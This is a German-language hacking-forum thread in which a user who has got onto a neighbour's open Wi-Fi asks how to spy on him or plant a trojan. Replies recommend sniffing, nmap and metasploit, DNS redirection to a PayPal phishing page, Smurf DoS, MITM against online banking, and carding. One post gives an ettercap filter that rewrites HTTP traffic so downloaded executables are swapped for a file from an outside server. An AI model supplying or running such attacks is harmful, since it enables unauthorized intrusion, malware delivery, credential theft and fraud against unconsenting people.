Was kann ich anstellen...

[!sniper]

Hi,

hab eben herausgefunden, dass jemand in meiner Umgebung ein offenes Wlan hat. Bin rein, naja ins Inet kann ich usw. offene Ordner gibt es auch^^

Aber was kann ich jetzt am besten machen?
Cain läuft natürlich schon durch

Kann ich dem irgendwie etwas unterjubeln? Die Frage ist nur wie?

[Delphianer]

Wie meinse das unterjubeln? (ein virus) oder (Eine Womögliche Strafanzeige )

Erstes:| Ka |
Zweitens:| Illegale sachen downloaden |

[!sniper]

naja ich will eig. wissen was er so treibt.(ggf. Trojaner)
Cain reicht

Ne ich will dem keinen ärger machen^^

Aber wie sicher bin ich dabei eigentlich?

[Cheese]

las halt mal nmap durch laufen und guck ob jemand nicht geupdated hat.

ansonsten natürlich sniffen was du schon machst, man könnte auchnoch dns abfragen manipulieren um paypal auf ne phishing seite von dir umzuleiten oder sowas.

[!sniper]

man könnte auchnoch dns abfragen manipulieren um paypal auf ne phishing seite von dir umzuleiten oder sowas.

Wie mache ich das?^^
Naja ich hab vlt. bald Zugriff auf den Router, das kann auch nicht schlecht sein...

nmap ist was?
edit: google hilft^^ http://de.wikipedia.org/wiki/Nmap

[Draik]

wenn du kontrolle über sein system willst, könntest du einmal nessus + metasploit versuchen, oder du manipulierst gleich den ganzen traffic mit ettercap und ersetzt sämtliche downloadanfragen von exe dateien mit deinem server (und hoffst, dass er keinen verdacht schöpft^^):

Code:

# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}

[Atbash]

Naja, wenn es ein größeres Netzwerk mit mehreren Rechnern ist, kannste jemanden mit einer Smurf-Attacke aus dem Netz DOSen.
Ein wenig BlackHat-iger wäre ein Man-in-the-Middle-Angriff, um beispielsweise SSL-gesicherte OnlineBanking Aktivitäten auszuhorchen.

~~ Das soll keine Anleitung sein, sondern nur eine Aufzeigung der Möglichkeiten. ~~

Grüße
atbash

[onboard]

Jetzt mal im Ernst: Warum so ein Aufwand um einen einzigen Computer (mit was auch immer) zu infizieren?

[Atbash]

Das war ja nicht die Frage...
Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!
Einfach weil mans kann, oder weils Spaß macht.
DoS find ich macht auch nicht viel Sinn, und trotzdem ist es für viele Leute einfach eine Genugtuung.
Und beim MITM-Angriff stehen denke ich finanzielle Gründe im Vordergrund, oder vielleicht noch ein 'höheres' Ziel.
Grüße
atbash

[onboard]

Das war ja nicht die Frage...
Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!

Weil man den Dump von 'nem Pferdeforum genauso gut cracken kann wie den aus 'nem Gayforum?
Ist doch scheiß egal mit welchem Thema sich das Board befasst, hauptsache die Userzahlen stimmen. Von daher kein überzeugendes Argument...

Was du jetzt anstellen kannst:
1. Du kannst kostenlos im Internet deines Nachbarn surfen!!!11einseinsölf
2. Du kannst nach herzenslust Faken & Carden
3. Be creative!